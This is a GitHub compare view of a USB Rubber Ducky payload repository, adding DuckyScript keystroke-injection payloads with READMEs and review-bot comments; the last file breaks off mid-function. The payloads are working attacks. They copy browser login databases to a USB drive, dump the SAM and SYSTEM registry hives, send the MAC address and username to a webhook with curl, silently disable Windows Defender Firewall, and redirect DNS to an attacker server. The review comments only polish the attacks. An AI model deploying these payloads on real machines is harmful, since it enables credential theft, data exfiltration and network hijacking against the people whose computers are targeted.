Compare commits


43 Commits

Author SHA1 Message Date
Mark bab7699944
Merge f843113663 into f3053273a4 2024-11-09 22:41:10 -07:00
Peaks f3053273a4
Merge pull request #493 from aleff-github/patch-95
Windows Spam Terminals
2024-11-08 06:24:15 -05:00
Peaks d5e02033fe
Merge pull request #498 from brunoooost/master
Adding RickRoll-Contact-iOS
2024-11-07 05:20:00 -05:00
bst04 b2b8cf8b2e changing category 2024-11-06 11:48:33 +01:00
Peaks 3333420b26
Merge pull request #497 from luu176/master
Deactivate/Disable Windows Firewall
2024-11-05 15:08:33 -05:00
bst04 8cd44e511c eliminate other payload 2024-11-04 15:03:31 +01:00
bst04 bad6fb6040 Adding Send-WhatsApp-Messages-MacOS to prank category 2024-11-04 15:02:21 +01:00
bst04 9c3f29df37 Adding RickRoll-Contact-iOS 2024-11-04 14:58:00 +01:00
Luu 3604620ab9
Create README.md 2024-11-04 13:00:57 +01:00
Luu 261e82a829
Create payload.txt 2024-11-04 13:00:31 +01:00
Peaks 5f13d6090f
Merge pull request #496 from luu176/master
DNS spoofer
2024-11-04 06:12:30 -05:00
Luu 1a1c79d5ba
Create payload.txt 2024-11-02 14:58:12 +01:00
Luu 203d986ae4
Create README.md 2024-11-02 14:57:52 +01:00
Peaks 6ae414c545
Merge pull request #495 from luu176/master
Exfiltrate NTLM hash files onto Rubber Ducky's SD card
2024-11-02 05:33:29 -04:00
Luu aeffdbfcbd
Delete payloads/library/execution/DNS_spoofer/payload.txt 2024-11-01 22:41:30 +01:00
Luu 9a5857b2af
Delete payloads/library/execution/DNS_spoofer/README.txt 2024-11-01 22:40:51 +01:00
Luu aa5afab7ed
Rename payload.txt to payload.txt 2024-11-01 15:42:11 +01:00
Luu f6fb02fe34
Create README.txt 2024-11-01 15:41:50 +01:00
Luu 0bb2f83a10
Create payload.txt 2024-11-01 15:32:44 +01:00
Luu 4a6e17773d
Update README.md 2024-10-31 12:58:23 +01:00
Luu 81ae8f0e8c
Create README.md 2024-10-31 12:56:53 +01:00
Luu 554b3066b7
Create payload.txt 2024-10-31 12:46:27 +01:00
Peaks 7f56669213
Merge pull request #492 from brunoooost/patch-2
Disable_WiFi-MacOS
2024-10-31 06:54:30 -04:00
Peaks 645f1e9fe3
Merge pull request #494 from aleff-github/patch-96
Exfiltrate Mac Address - MacOS
2024-10-31 04:43:07 -04:00
bst04 59d4883817 Rename of Disable_WiFi-MacOS 2024-10-31 09:38:35 +01:00
Aleff 1ea9c8a689 Exfiltrate Mac Address - MacOS 2024-10-31 08:23:15 +01:00
Aleff 47fa68ecd9 Windows Spam Terminals 2024-10-31 08:16:18 +01:00
bst04 b9de56e67d
Create README.md
Adding my README.md to the execution category
2024-10-30 16:27:47 +01:00
bst04 0403e79d70
Create payload.txt
Adding my Disable WiFi - MacOS to the execution category.
2024-10-30 16:22:49 +01:00
Peaks a8c264c752
Merge pull request #486 from UberGuidoZ/master
DS3 updates and a NEW PAYLOAD!
2024-10-27 18:11:58 -04:00
UberGuidoZ a18f4561e2
Update payload.txt
- Increased version for good measure
2024-10-27 14:49:00 -07:00
UberGuidoZ ad644d8849
Update payload.txt
- Increased version for good measure
2024-10-27 14:48:18 -07:00
UberGuidoZ 8c3110d8f1
Update payload.txt
- Added DS3 ATTACKMODE for ease of use
2024-10-27 14:40:40 -07:00
UberGuidoZ a94beb0c75
Update payload.txt
- Added DS3 ATTACKMODE for ease of use
2024-10-27 14:40:11 -07:00
UberGuidoZ 467075df68
Update payload.txt
- Added DS3 ATTACKMODE for ease of use
- Changed capital C to lowercase to appease DS3
- Fixed typo in batch
2024-10-27 14:38:05 -07:00
UberGuidoZ e3c28b36ee
Merge branch 'hak5:master' into master 2024-10-27 14:31:47 -07:00
UberGuidoZ b2c8194099
Create ReadMe.md 2024-10-02 10:50:56 -07:00
UberGuidoZ 97745c360d
Initial commit and upload 2024-10-02 10:32:49 -07:00
Mark f843113663
Update Payload.txt 2024-05-31 09:31:35 -04:00
Mark 81260982f1
Rename CredentialHarvester.txt to Payload.txt 2024-05-28 23:39:23 -04:00
Mark 582bb6138a
Rename VulnerabilityScanner.txt to Payload.txt 2024-05-28 23:38:47 -04:00
Mark 5b5c57f16b
Create VulnerabilityScanner.txt 2024-05-28 23:38:24 -04:00
Mark ddd7d2af4b
Create CredentialHarvester.txt 2024-05-28 23:34:46 -04:00
21 changed files with 1727 additions and 5 deletions


@ -0,0 +1,27 @@
# Spoof DNS - Windows ✅
DNS Spoofer
## Description
A payload used to alter the machines DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
### Settings
* Set the primary and secondary dns servers
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>
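Review bot: the Settings section lists only the primary and secondary DNS servers, but the payload also hard-codes the adapter name through `DEFINE #interface Ethernet`, and `Set-DnsClientServerAddress -InterfaceAlias` does nothing useful unless that alias matches the target's interface exactly; document `#interface` here as a third setting. The Description's "the machines DNS settings" should read "the machine's DNS settings", the README title "Spoof DNS" does not match the payload's `REM Title: DNS changer`, and `<div align=center>` should quote the attribute value as the NTLM README in this same change does (`<div align="center">`).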


@ -0,0 +1,69 @@
REM Title: DNS changer
REM Author: luu176
REM Description: Changes DNS address of windows machine in powershell
REM Target: Windows 10/11
REM wifi interface should be named: Wi-Fi
DEFINE #interface Ethernet
DEFINE #primaryDNS 192.168.1.3
DEFINE #secondaryDNS 1.1.1.1
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
GUI r
DELAY 150
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 500
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
REM below is to blink the LED when payload done
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE
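Review bot: `REM wifi interface should be named: Wi-Fi` directly contradicts the next line, `DEFINE #interface Ethernet`; `Set-DnsClientServerAddress -InterfaceAlias "#interface"` will target the wrong adapter, or fail with no feedback to the payload, whenever the alias does not match, so pick one value and make the comment describe it. The PASSIVE_WINDOWS_DETECT extension sets `$_OS`, and its own DOCUMENTATION block says to use it at the end of the payload, yet nothing after `END_EXTENSION` checks it, so `GUI r` and the PowerShell lines are typed blind on a non-Windows host; wrap the body in `IF ($_OS == WINDOWS) THEN ... END_IF` as the extension's EXAMPLE USAGE block shows. The payload also has no `ATTACKMODE` line and no `REM Version:` header, unlike the other payloads in this change.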


@ -0,0 +1,24 @@
# Disable WiFi 🛜
This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
### Details
- **Title**: Disable WiFi
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Execution
- **Target**: MacOS
### Dependencies
- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
`DEFINE #MODE off`
## How It Works 📜
1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Terminal**.
- Run or stop the WiFi
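Review bot: "littebit" in step 2 should be "little bit", the sub-items of step 3 mix "Runs commands" with "Run or stop the WiFi" (use "Runs ... / Enables or disables the Wi-Fi"), and the heading levels go `### Details`, `### Dependencies`, `## How It Works`, which promotes the last section above the two before it; use one level for all three. The intro tells the reader to "modify the script to replace 'off' with 'on'" while the Dependencies section already documents `DEFINE #MODE off` for exactly that purpose, so point the intro at `#MODE` rather than at editing the script body.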


@ -0,0 +1,53 @@
REM_BLOCK
##################################
# #
# Title : Disable WiFi #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : MacOS #
# #
##################################
END_REM
REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
DEFINE #MODE off
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN TERMINAL
DELAY 250
STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
DELAY 250
GUI q
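Review bot: `STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE` assumes the network service is literally named "Wi-Fi"; on a Mac where the service has been renamed or localized the command fails and the payload has no way to notice, so the header (or README) should state that the name must match the output of `networksetup -listallnetworkservices`. `GUI q` at the end quits Terminal as a whole, closing any sessions the user already had open, which the header does not mention. Minor: the comment `Change the #MODE value to "on" if you want to run the WiFi` reads better as "enable the Wi-Fi", and `#MODE` accepts any text, so a value other than `on`/`off` is passed straight to `networksetup`.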


@ -0,0 +1,23 @@
# Firewall Deactivator - Windows ✅
Deactivate firewall on windows
## Description
A payload used to deactivate all firewalls on windows in a discrete manner.
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>
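Review bot: "in a discrete manner" should be "in a discreet manner" (discrete means separate), and "deactivate all firewalls on windows" overstates what the payload does: the command in the companion hunk, `Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False`, disables the three Windows Defender Firewall profiles only and leaves third-party firewall products untouched, so the Description should say "the Windows Defender Firewall profiles". "windows" should be capitalized, and `<div align=center>` should quote the attribute value.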


@ -0,0 +1,61 @@
REM Title: Firewall deactivator
REM Author: luu176
REM Description: Deactivate all firewalls in windows machine using hidden powershell
REM Target: Windows
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 200
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
DELAY 800
ALT y
SAVE_HOST_KEYBOARD_LOCK_STATE
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE
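Review bot: `REM Description: Deactivate all firewalls in windows machine` does not match the command, which calls `Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False` and therefore affects the Windows Defender Firewall profiles only. `$_OS` from PASSIVE_WINDOWS_DETECT is never tested, so the body runs on any host; gate it with `IF ($_OS == WINDOWS) THEN ... END_IF` as the extension's EXAMPLE USAGE block shows. `ALT y` after `DELAY 800` assumes a consent-style UAC prompt: when the logged-on user is not a local administrator, UAC asks for credentials instead and the payload stalls at that dialog, so `REM Target: Windows` should add "administrator account required". Like the DNS payload, this one has no `REM Version:` line and no `ATTACKMODE` statement.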


@ -0,0 +1,63 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: CredentialHarvester %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: github.com/markcyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM Open PowerShell with elevated privileges
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1500
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter;
ENTER
DELAY 500
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive
ENTER
DELAY 500
STRING mkdir BrowserData
ENTER
DELAY 500
STRING cd BrowserData
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"
ENTER
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off ^| clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500
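Review bot: `REM Open PowerShell with elevated privileges` does not describe the lines beneath it, which launch a plain `powershell` from the Run dialog with no elevation request; either the comment or the header's stated requirements is wrong, and the mismatch should be resolved before merge. The clipboard step at the end is labelled by its own comment as "not necessary", so either drop it or say when it applies. The banner has no `Version:` field, unlike every other payload header in this change, and the `%` banner lines are far wider than the repository's other headers.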


@ -0,0 +1,25 @@
# Exfiltrate Mac Address - MacOS
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
### Details
- **Title**: Exfiltrate Mac Address
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Exfiltration
- **Target**: MacOS
### Dependencies
- Set the #WEBHOOK to complete the exfiltration
`DEFINE #WEBHOOK example`
## How It Works 📜
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Terminal**.
- Acquire the mac address and the system user name
- Send this informations through the Webhook
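Review bot: `DEFINE #WEBHOOK example` is listed as the only dependency, but nothing says the value must be a complete URL the target can reach; with the shipped placeholder the payload's `curl -X POST ... #WEBHOOK` line fails, so state the expected format. Wording: "littebit" should be "little bit", "Acquire the mac address" and "Send this informations" should read "Acquires the MAC address" and "Sends this information", and "Mac Address" in the title reads as the Apple brand rather than "MAC address". Heading levels: `### Dependencies` followed by `## How It Works` inverts the hierarchy, as in the sibling READMEs.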


@ -0,0 +1,55 @@
REM_BLOCK
####################################################
# #
# Title : Exfiltrate Mac Address - MacOS #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : MacOS #
# #
####################################################
END_REM
REM Set the #WEBHOOK to complete the exfiltration
DEFINE #WEBHOOK example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN TERMINAL
DELAY 750
STRINGLN mac=$(networksetup -getmacaddress en0)
DELAY 750
STRINGLN name=$(id -un)
DELAY 850
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK
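Review bot: `mac=$(networksetup -getmacaddress en0)` hard-codes `en0` and captures the command's whole output line, not only the address, so what is posted is the full "Ethernet Address ... (Device: en0)" text, or an error message when `en0` does not exist; the header should document the `en0` assumption and the README's "retrieve the MAC address" should match what is actually sent. `DEFINE #WEBHOOK example` ships a non-URL default, so the final `curl -X POST` fails until the user edits it; a comment at the DEFINE should say the value must be a full URL. Unlike the Disable WiFi payload from the same author, this one has no `REM Version:` cross-check between header and README beyond the banner.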


@ -0,0 +1,29 @@
# Exfiltrate NTLM Hash - Windows ✅
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
## Description
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
### Settings
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
## Credits
<h2 align="center"> Luu176 </h2>
<div align="center">
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
</a>
<br>GitHub
</td>
</tr>
</table>
</div>
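Review bot: the Description explains the SD-card destination and the Settings explain `DUCKY` and `#numBlinks`, but the README never says that saving the SAM and SYSTEM hives requires an elevated console and therefore a UAC prompt that the payload answers with `ALT y`; a non-administrator login is a silent failure mode and belongs under Settings or a Requirements note. The inline `<strong><u>` tags sit oddly beside the Markdown in the rest of the file; `**bold**` would match the other READMEs in this change.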


@ -0,0 +1,81 @@
REM_BLOCK
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
AUTHOR Luu176
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
the defined storage drive on the Ducky device.
END_REM
DEFINE #driveLabel DUCKY
REM below you can set the number of blinks for the caps lock when finished (default 9)
DEFINE #numBlinks 9
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
IF ($_CAPSLOCK_ON == TRUE)
CAPSLOCK
END_IF
GUI d
DELAY 1000
GUI r
DELAY 500
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 800
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
GUI d
WAIT_FOR_CAPS_ON
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
VAR $i = 0
WHILE ( $i < #numBlinks )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE
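Review bot: `IF ($_CAPSLOCK_ON == TRUE)` is the only conditional in the file without `THEN`; every other one, including those inside the extension, is written `IF (...) THEN`, so make it consistent. `WAIT_FOR_CAPS_ON` has no timeout: if the UAC prompt is denied, the storage label does not match `#driveLabel`, or either `reg save` fails, the `SendKeys('{CAPSLOCK}')` never fires and the payload blocks forever with the keyboard lock state saved and never restored. Naming: the DESCRIPTION and README say "SAM and SYSTEM" while the command writes `SAM` and `SYS`, and calling registry hives "NTLM hash files" is loose given that the command is `reg save hklm\sam` / `reg save hklm\system`. `$_OS` set by PASSIVE_WINDOWS_DETECT is, again, never checked.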


@ -0,0 +1,5 @@
## 1 Script to Rule Them All
The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.
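Review bot: the README explains why the extension was renamed "to avoid conflicts" but never gives the name; state that the extension is `OS_DETECTION_UBER` and that callers use `DETECT_OS_UBER()` and `HELLO_OS_UBER()`, and name the two upstream extensions it merges so readers can compare. "frankenstein" should be capitalized, and per the commit list the file is `ReadMe.md` while the rest of the repository uses `README.md`.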


@ -0,0 +1,293 @@
REM Title: One Script To Rule Them All
REM Author: Korben and UberGuidoZ
REM Description: Attempt to detect OS then run conditional code based on result.
REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
REM Version: 1.6
REM Category: All of them
REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
EXTENSION OS_DETECTION_UBER
REM VERSION 2.0
REM AUTHOR: Korben and UberGuidoZ
REM_BLOCK DOCUMENTATION
USB Rubber Ducky Host OS Detection (moving target, may fall)
Results may vary greatly depending on a combination of many variables:
- number of testing stages
- specific devices and versions tested against
- number of systems testing for (scope)
- detection techniques (passive/invisible/active/hybrid)
- overall speed
- overall accuracy
If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
TARGET:
DEFAULT - Windows, Mac, Linux
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
USAGE:
Call DETECT_OS_UBER() anywhere in your payload after the extension.
Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
FEEDBACK:
As mentioned above, this a moving target (especially for macOS).
Please report any issues identifying specific operating systems with as much detail as possible.
Your feedback will greatly help solidify the robustness of this extension and others based on it.
DEBUGGING:
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
END_REM
REM CONFIGURATION
REM For Debugging (use if troubleshooting or reporting issues):
DEFINE #DEBUGGING_OUTPUT FALSE
DEFINE #ADVANCED_DETECTION FALSE
REM Timing fine tuning:
DEFINE #STARTUP_DELAY 1500
DEFINE #RESTART_WAIT 1000
DEFINE #EXECUTE_DELAY 2000
DEFINE #CONNECT_WAIT 1000
DEFINE #OS_DETECT_MODE HID
REM Define Apple keyboard to keep macOS happy
DEFINE #OS_DETECT_VID VID_05AC
DEFINE #OS_DETECT_PID PID_021E
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #HOST_RESPONSE_TIMEOUT 1000
REM Start DETECT_OS function
FUNCTION DETECT_OS_UBER()
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #STARTUP_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Debugging if TRUE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
IF_DEFINED_TRUE #ADVANCED_DETECTION
STRING ADVANCED OS DETECT
ELSE_DEFINED
STRING OS DETECT
END_IF_DEFINED
ENTER
STRING test caps
END_IF_DEFINED
IF ($_CAPSLOCK_ON == FALSE) THEN
LED_R
CAPSLOCK
DELAY #HOST_RESPONSE_TIMEOUT
END_IF
LED_OFF
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING test done
END_IF_DEFINED
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING received led response
END_IF_DEFINED
LED_G
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Prediction: Windows
END_IF_DEFINED
$_OS = WINDOWS
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Prediction: Linux
END_IF_DEFINED
$_OS = LINUX
END_IF
ELSE
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING No LED response
ENTER
STRING Prediciton: MacOS
END_IF_DEFINED
$_OS = MACOS
END_IF
IF_DEFINED_TRUE #ADVANCED_DETECTION
IF ( $_OS == LINUX ) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Soft reconnect
END_IF_DEFINED
ATTACKMODE OFF
DELAY #RESTART_WAIT
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY #CONNECT_WAIT
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Reconnected
END_IF_DEFINED
IF ($_CAPSLOCK_ON == TRUE) THEN
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER
STRING Caps LED on
ENTER
STRING Test numlock
END_IF_DEFINED
NUMLOCK
DELAY #HOST_RESPONSE_TIMEOUT
